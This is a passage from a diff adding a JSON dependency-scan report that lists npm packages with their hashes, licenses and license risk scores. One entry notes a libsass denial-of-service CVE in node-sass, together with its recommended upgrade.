"patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/watchpack" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a885de27-7f14-48b0-8f33-b9c5f74eaf00", + "keyId": 26955121, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.uniq/-/lodash.uniq-4.5.0.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.uniq" + }, + "matchType": "SHA1", + "sha1": "d0225373aeb652adc1bc82e4945339a842754773", + "name": "lodash.uniq-4.5.0.tgz", + "artifactId": "lodash.uniq-4.5.0.tgz", + "version": "4.5.0", + "groupId": "lodash.uniq", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/319d4070-c364-40dc-8ee3-4633f8e5a57b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5566e75e-cfce-4808-b9f5-56e07ff1fada", + "keyId": 27311322, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mem/-/mem-4.3.0.tgz", + "homePage": "https://github.com/sindresorhus/mem#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mem" + }, + "matchType": "SHA1", + "sha1": "461af497bc4ae09608cdb2e60eefb69bff744178", + "name": "mem-4.3.0.tgz", + "artifactId": "mem-4.3.0.tgz", + "version": "4.3.0", + "groupId": "mem", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2b32cbeb-f7bd-4306-8dff-acc880085d18" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6359c79c-aece-4f57-bccc-859c22c1a10f", + "keyId": 26965667, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.toarray/-/lodash.toarray-4.4.0.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.toarray" + }, + "matchType": "SHA1", + "sha1": "24c4bfcd6b2fba38bfd0594db1179d8e9b656561", + "name": "lodash.toarray-4.4.0.tgz", + "artifactId": "lodash.toarray-4.4.0.tgz", + "version": "4.4.0", + "groupId": "lodash.toarray", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/249ea7cd-86ea-40ca-8f24-a1bb305e6733" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "71eb7ec8-6c51-479a-a09e-385a174e34ad", + "keyId": 27022862, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/tree-kill/-/tree-kill-1.2.1.tgz", + "homePage": "https://github.com/pkrumins/node-tree-kill", + "genericPackageIndex": "https://www.npmjs.org/package/tree-kill" + }, + "matchType": "SHA1", + "sha1": "5398f374e2f292b9dcc7b2e71e30a5c3bb6c743a", + "name": "tree-kill-1.2.1.tgz", + "artifactId": "tree-kill-1.2.1.tgz", + "version": "1.2.1", + "groupId": "tree-kill", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2a136175-c3eb-46f4-85ca-396f3c1e0cc3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fc819d6a-447f-4910-8d6b-0325d0fccde1", + "keyId": 27499551, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-5.1.0.tgz", + "homePage": "https://github.com/chalk/wrap-ansi#readme", + "genericPackageIndex": "https://www.npmjs.org/package/wrap-ansi" + }, + "matchType": "SHA1", + "sha1": "1fd1f67235d5b6d0fee781056001bfb694c03b09", + "name": "wrap-ansi-5.1.0.tgz", + "artifactId": "wrap-ansi-5.1.0.tgz", + "version": "5.1.0", + "groupId": "wrap-ansi", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2ed6e9cc-6fc1-4578-8f7c-7c81ec76f0a5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b1b6b9da-9d61-41a8-a763-33670d590222", + "keyId": 26967813, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mute-stream/-/mute-stream-0.0.6.tgz", + "homePage": "https://github.com/isaacs/mute-stream#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mute-stream" + }, + "matchType": "SHA1", + "sha1": "48962b19e169fd1dfc240b3f1e7317627bbc47db", + "name": "mute-stream-0.0.6.tgz", + "artifactId": "mute-stream-0.0.6.tgz", + "version": "0.0.6", + "groupId": "mute-stream", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3c1e6206-f482-4ece-89ef-8a939dc7d1ff" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "369b1c74-3702-4241-8747-16c43f4aaebe", + "keyId": 28432165, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-breadcrumb/-/honeyui-breadcrumb-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/breadcrumb#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-breadcrumb" + }, + "matchType": "SHA1", + "sha1": "37098fb5f5250077707a062411504821d4aafbc3", + "name": "honeyui-breadcrumb-1.1.1.tgz", + "artifactId": "honeyui-breadcrumb-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-breadcrumb", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9bc28c86-6abb-49ff-a93e-69f1d4a16f8e", + "keyId": 27100375, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-env-function/-/postcss-env-function-2.0.2.tgz", + "homePage": "https://github.com/jonathantneal/postcss-env-function#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-env-function" + }, + "matchType": "SHA1", + "sha1": "0f3e3d3c57f094a92c2baf4b6241f0b0da5365d7", + "name": "postcss-env-function-2.0.2.tgz", + "artifactId": "postcss-env-function-2.0.2.tgz", + "version": "2.0.2", + "groupId": "postcss-env-function", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5d751d66-cf25-41d3-9d08-a4379d11f97c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d3194b8e-32a3-4a38-a157-7d5bc05bd3b2", + "keyId": 27100336, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-color-mod-function/-/postcss-color-mod-function-3.0.3.tgz", + "homePage": "https://github.com/jonathantneal/postcss-color-mod-function#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-color-mod-function" + }, + "matchType": "SHA1", + "sha1": "816ba145ac11cc3cb6baa905a75a49f903e4d31d", + "name": "postcss-color-mod-function-3.0.3.tgz", + "artifactId": "postcss-color-mod-function-3.0.3.tgz", + "version": "3.0.3", + "groupId": "postcss-color-mod-function", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ccca5332-7413-4aad-a5ec-8d436b190056" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e74a45aa-883c-4bfb-b5d2-78087792d495", + "keyId": 27664938, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/is-obj#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-obj" + }, + "matchType": "SHA1", + "sha1": "473fb05d973705e3fd9620545018ca8e22ef4982", + "name": "is-obj-2.0.0.tgz", + "artifactId": "is-obj-2.0.0.tgz", + "version": "2.0.0", + "groupId": "is-obj", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d27d305f-e790-424a-8dd6-fab04073f95a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c00ea18b-2e94-49b9-b608-b28e41b72e4f", + "keyId": 27482429, + "type": "SOURCE_LIBRARY", + "languages": "C++", + "references": { + "url": "https://github.com/sass/node-sass.git", + "homePage": "https://npmjs.org/package/node-sass", + "downloadLink": "https://github.com/sass/node-sass/zipball/v4.12.0" + }, + "sha1": "23c86596a9bbcf1e72c6871e3a7cf084d7b68496", + "name": "node-sass-v4.12.0", + "artifactId": "node-sass", + "version": "v4.12.0", + "groupId": "sass", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "License File", + "reference": "License File (https://github.com/sass/node-sass/blob/v4.12.0/package.json)" + } + ], + "vulnerabilities": [ + { + "name": "CVE-2018-19839", + "type": "CVE", + "severity": "MEDIUM", + "score": 4.3, + "cvss3_severity": "MEDIUM", + "cvss3_score": 6.5, + "scoreMetadataVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "publishDate": "2018-12-04", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19839", + "description": "In LibSass prior to 3.5.5, the function handle_error in sass_context.cpp allows attackers to cause a denial-of-service resulting from a heap-based buffer over-read via a crafted sass file.", + "topFix": { + "vulnerability": "CVE-2018-19839", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19839", + "fixResolution": "Upgrade to version 3.5.5", + "message": "Upgrade to version" + }, + "allFixes": [ + { + "vulnerability": "CVE-2018-19839", + "type": "UPGRADE_VERSION", + "origin": "WHITESOURCE_EXPERT", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2018-19839", + "fixResolution": "Upgrade to version 3.5.5", + "message": "Upgrade to version" + }, + { + "vulnerability": "CVE-2018-19839", + "type": "CHANGE_FILES", + "origin": "GITHUB_COMMIT", + "url": "https://github.com/sass/libsass/commit/2cabd116b95d67dcd9d44fcb936dee03f4fc71b9", + "fixResolution": "Replace or update the following files: checked.h, core.h", + "date": "2018-11-28", + "message": "Update utfcpp to v2.3.6\n\nFixes #2657\n\nIncorporates the following utfcpp patches:\n\n1. Sass addition of `retreat`.\n https://github.com/nemtrif/utfcpp/pull/20\n\n2. Fix for `replace_invalid` throwing on incomplete sequence at the end\n of the input.\n https://github.com/nemtrif/utfcpp/pull/21" + } + ], + "sourceFiles": [ + { + "name": "core.h", + "sha1": "7d125c7b2bc4d1fb73d2b09e6eb927f93a9b407c", + "bytes": 0, + "numOfLines": 0, + "localPath": "/data/node_modules/node-sass/src/libsass/src/utf8/core.h", + "id": 2631650 + } + ], + "references": [] + } + ], + "customAttributeValues": [] + }, + { + "keyUuid": "1b97d792-a2ea-4b87-8664-56cfdbf90484", + "keyId": 28452181, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/contentful-batch-libs/-/contentful-batch-libs-9.0.1.tgz", + "homePage": "https://github.com/contentful/contentful-batch-libs#readme", + "genericPackageIndex": "https://www.npmjs.org/package/contentful-batch-libs" + }, + "matchType": "SHA1", + "sha1": "508321f736c7af822cb56943776b3b11b95c77d3", + "name": "contentful-batch-libs-9.0.1.tgz", + "artifactId": "contentful-batch-libs-9.0.1.tgz", + "version": "9.0.1", + "groupId": "contentful-batch-libs", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/15d085fb-4b5e-4acf-baba-cc5e243baf08" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c8f0f6d2-c61b-417b-89f9-8a526c3865d1", + "keyId": 28452182, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/contentful-import/-/contentful-import-7.6.1.tgz", + "homePage": "https://github.com/contentful/contentful-import#readme", + "genericPackageIndex": "https://www.npmjs.org/package/contentful-import" + }, + "matchType": "SHA1", + "sha1": "e54e0c6414e22cf2ecd6d743bcc8c887c159e52d", + "name": "contentful-import-7.6.1.tgz", + "artifactId": "contentful-import-7.6.1.tgz", + "version": "7.6.1", + "groupId": "contentful-import", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b4f0bd30-6315-43a9-b5c3-9386bfe951ec" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3880dab1-873a-43e1-a961-c0f66038f4c5", + "keyId": 28452185, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/contentful-export/-/contentful-export-7.7.1.tgz", + "homePage": "https://github.com/contentful/contentful-export#readme", + "genericPackageIndex": "https://www.npmjs.org/package/contentful-export" + }, + "matchType": "SHA1", + "sha1": "ed46453a6b1e7a7b6a84dbfabe212cc172389ec9", + "name": "contentful-export-7.7.1.tgz", + "artifactId": "contentful-export-7.7.1.tgz", + "version": "7.7.1", + "groupId": "contentful-export", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/514adb8f-c214-4cbb-9ff6-6aafc8f94486" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3a39e740-0829-42f7-8177-9b0a5b8c4b95", + "keyId": 28452183, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/express-winston/-/express-winston-4.0.1.tgz", + "homePage": "https://github.com/bithavoc/express-winston#readme", + "genericPackageIndex": "https://www.npmjs.org/package/express-winston" + }, + "matchType": "SHA1", + "sha1": "98c74d099b9a7fdeedc56eb839c223968bc33990", + "name": "express-winston-4.0.1.tgz", + "artifactId": "express-winston-4.0.1.tgz", + "version": "4.0.1", + "groupId": "express-winston", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/express-winston" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "09d301a7-d21d-4f77-8949-dcdb0cfa84d5", + "keyId": 28435819, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/schema-utils/-/schema-utils-2.5.0.tgz", + "homePage": "https://github.com/webpack/schema-utils", + "genericPackageIndex": "https://www.npmjs.org/package/schema-utils" + }, + "matchType": "SHA1", + "sha1": "8f254f618d402cc80257486213c8970edfd7c22f", + "name": "schema-utils-2.5.0.tgz", + "artifactId": "schema-utils-2.5.0.tgz", + "version": "2.5.0", + "groupId": "schema-utils", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0a15f27c-15e6-4524-b4dc-348774b269a3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1ed0ff34-7ff8-45af-b45c-c1452b8b7722", + "keyId": 28424075, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-3.0.1.tgz", + "homePage": "https://github.com/npm/write-file-atomic", + "genericPackageIndex": "https://www.npmjs.org/package/write-file-atomic" + }, + "matchType": "SHA1", + "sha1": "558328352e673b5bb192cf86500d60b230667d4b", + "name": "write-file-atomic-3.0.1.tgz", + "artifactId": "write-file-atomic-3.0.1.tgz", + "version": "3.0.1", + "groupId": "write-file-atomic", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/450f7c82-7437-4cb1-8921-921caa0db71e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "388a9b94-6be2-4d66-86da-9f1eda12c52a", + "keyId": 28465279, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cssnano-preset-simple/-/cssnano-preset-simple-1.0.1.tgz", + "homePage": "https://github.com/timer/cssnano-preset-simple#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cssnano-preset-simple" + }, + "matchType": "SHA1", + "sha1": "a53b3c7b67faf49e0a1d79c4a9b7af9dd3d6c812", + "name": "cssnano-preset-simple-1.0.1.tgz", + "artifactId": "cssnano-preset-simple-1.0.1.tgz", + "version": "1.0.1", + "groupId": "cssnano-preset-simple", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/41437600-0714-4a0d-8828-f8f8950bccb9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3c32664a-7b1e-4054-bc5b-b745889d141a", + "keyId": 28384878, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/core-js/-/core-js-2.6.10.tgz", + "homePage": "https://github.com/zloirock/core-js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/core-js" + }, + "matchType": "SHA1", + "sha1": "8a5b8391f8cc7013da703411ce5b585706300d7f", + "name": "core-js-2.6.10.tgz", + "artifactId": "core-js-2.6.10.tgz", + "version": "2.6.10", + "groupId": "core-js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/core-js/v/2.6.10" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e264f00e-9025-4f19-afbf-980f6457e912", + "keyId": 28403867, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/bluebird/-/bluebird-3.7.1.tgz", + "homePage": "https://github.com/petkaantonov/bluebird", + "genericPackageIndex": "https://www.npmjs.org/package/bluebird" + }, + "matchType": "SHA1", + "sha1": "df70e302b471d7473489acf26a93d63b53f874de", + "name": "bluebird-3.7.1.tgz", + "artifactId": "bluebird-3.7.1.tgz", + "version": "3.7.1", + "groupId": "bluebird", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9e644798-2efe-49a1-8fbb-846d140cfdc1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ff1aaf96-1144-4ebc-bd3d-730b0bd22b3f", + "keyId": 28481003, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/contentful-management/-/contentful-management-5.11.3.tgz", + "homePage": "https://www.contentful.com/developers/documentation/content-management-api/", + "genericPackageIndex": "https://www.npmjs.org/package/contentful-management" + }, + "matchType": "SHA1", + "sha1": "f6daafda46e0f1fd46633ab480a1780dc4ea2b0c", + "name": "contentful-management-5.11.3.tgz", + "artifactId": "contentful-management-5.11.3.tgz", + "version": "5.11.3", + "groupId": "contentful-management", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b5ad3ffe-292d-440d-8139-d32d88addbab" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "79a78960-be2c-42bf-83b1-f6ea05cbfcd7", + "keyId": 28531335, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/use-subscription/-/use-subscription-1.1.1.tgz", + "homePage": "https://github.com/facebook/react#readme", + "genericPackageIndex": "https://www.npmjs.org/package/use-subscription" + }, + "matchType": "SHA1", + "sha1": "5509363e9bb152c4fb334151d4dceb943beaa7bb", + "name": "use-subscription-1.1.1.tgz", + "artifactId": "use-subscription-1.1.1.tgz", + "version": "1.1.1", + "groupId": "use-subscription", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "036f553b-e29d-4c73-9ad3-711a1dd1d7a8", + "keyId": 28387952, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-wsl/-/is-wsl-2.1.1.tgz", + "homePage": "https://github.com/sindresorhus/is-wsl#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-wsl" + }, + "matchType": "SHA1", + "sha1": "4a1c152d429df3d441669498e2486d3596ebaf1d", + "name": "is-wsl-2.1.1.tgz", + "artifactId": "is-wsl-2.1.1.tgz", + "version": "2.1.1", + "groupId": "is-wsl", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-wsl/v/2.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f9e32b23-a779-4d15-8028-dd2b678d2397", + "keyId": 28531337, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@ampproject/toolbox-script-csp/-/toolbox-script-csp-1.1.1.tgz", + "homePage": "https://github.com/ampproject/amp-toolbox/tree/master/packages/script-csp", + "genericPackageIndex": "https://www.npmjs.org/package/@ampproject/toolbox-script-csp" + }, + "matchType": "SHA1", + "sha1": "0b049a1c86c99f300162a10e1b9ce83c6e354a45", + "name": "toolbox-script-csp-1.1.1.tgz", + "artifactId": "toolbox-script-csp-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@ampproject/toolbox-script-csp", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@ampproject/toolbox-script-csp/v/1.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "6f7ca740-0aec-4005-8be3-4b1e4278dbf9", + "keyId": 28251422, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-runtime/-/plugin-transform-runtime-7.6.2.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-runtime" + }, + "matchType": "SHA1", + "sha1": "2669f67c1fae0ae8d8bf696e4263ad52cb98b6f8", + "name": "plugin-transform-runtime-7.6.2.tgz", + "artifactId": "plugin-transform-runtime-7.6.2.tgz", + "version": "7.6.2", + "groupId": "@babel/plugin-transform-runtime", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-transform-runtime" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cf7e1d0a-52bb-4b34-bb1b-f4c9f3c6e348", + "keyId": 28368212, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/core/-/core-7.6.4.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/core" + }, + "matchType": "SHA1", + "sha1": "6ebd9fe00925f6c3e177bb726a188b5f578088ff", + "name": "core-7.6.4.tgz", + "artifactId": "core-7.6.4.tgz", + "version": "7.6.4", + "groupId": "@babel/core", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9aace903-f8e6-44c1-8a10-a22c718d207a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "61b5a5c2-f678-4d9f-978f-45ab550b9c67", + "keyId": 28350152, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.6.3.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/runtime" + }, + "matchType": "SHA1", + "sha1": "935122c74c73d2240cafd32ddb5fc2a6cd35cf1f", + "name": "runtime-7.6.3.tgz", + "artifactId": "runtime-7.6.3.tgz", + "version": "7.6.3", + "groupId": "@babel/runtime", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": 